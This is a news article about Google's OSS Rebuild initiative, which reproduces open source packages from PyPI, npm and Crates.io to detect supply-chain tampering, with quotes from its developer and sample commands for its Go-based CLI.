Open source software runs pretty much everything these days, but with that popularity comes risk. Hackers have figured out they can slip malicious code into popular packages and infect thousands of systems in one shot. Now Google is stepping in with a new initiative called OSS Rebuild, and it could be a game changer for developers and security teams alike.
Matthew Suozzo from Google’s Open Source Security Team introduced OSS Rebuild as a way to “strengthen trust in open source package ecosystems by reproducing upstream artifacts.” That means rebuilding packages like those on PyPI, npm, and Crates.io, and making sure they match the original source code. If they don’t, it could be a sign that something’s wrong.
“OSS Rebuild gives security teams powerful data to avoid compromise without burden on upstream maintainers,” Suozzo said. That’s a key point. The tool works behind the scenes, without putting extra work on the people who publish and maintain open source packages. It automatically generates build definitions, creates provenance metadata following the SLSA Build Level 3 standard, and flags anything suspicious.
This kind of system might have caught incidents like the backdoor in xz-utils or the shady code injection in solana/webjs. OSS Rebuild looks for several types of supply chain threats, including stealthy backdoors, build environment compromises, and packages that include code not found in the public source repository. It even monitors for suspicious behavior during the build process, something that’s almost impossible to catch with manual review.
And if this sounds familiar, that’s because we just covered something similar in our report on malicious AUR packages in Arch Linux. OSS isn’t immune to attack, and OSS Rebuild is another reminder that we can’t blindly trust package managers anymore.
The project is already rebuilding thousands of packages from PyPI, npm, and Crates.io. Even better, you can test it yourself. Google has released a Go-based CLI that lets you fetch provenance metadata or even rebuild packages manually. Here’s a taste:
go install github.com/google/oss-rebuild/v0/cmd/oss-rebuild
oss-rebuild get cratesio syn 2.0.39
oss-rebuild list pypi absl-py
You can even rebuild a package inside Docker with a single command:
oss-rebuild get npm lodash 4.17.20 –format=dockerfile | \
docker run $(docker buildx build -q -)
Suozzo said the long-term vision is bigger than any one ecosystem. “We are committed to bringing supply chain transparency and security to all open source software development,” he wrote. And while the current focus is on Python, JavaScript, and Rust, the infrastructure can be expanded to cover other languages and registries over time.
Google is also experimenting with using AI to help understand build instructions written in natural language. According to Suozzo, early tests show promise: “Our initial experiments have demonstrated the approach’s viability in automating exploration and testing, with limited human intervention, even in the most complex builds.”
OSS Rebuild doesn’t replace other security tools, but it does fill a major gap. It lets you verify that the packages you rely on are safe, even if the maintainers never added build provenance themselves. It also adds extra value to SBOMs by enriching them with reproducible build data.
If you want to check it out or contribute, the project is live on GitHub at github.com/google/oss-rebuild. You can also learn more about the provenance framework at slsa.dev.
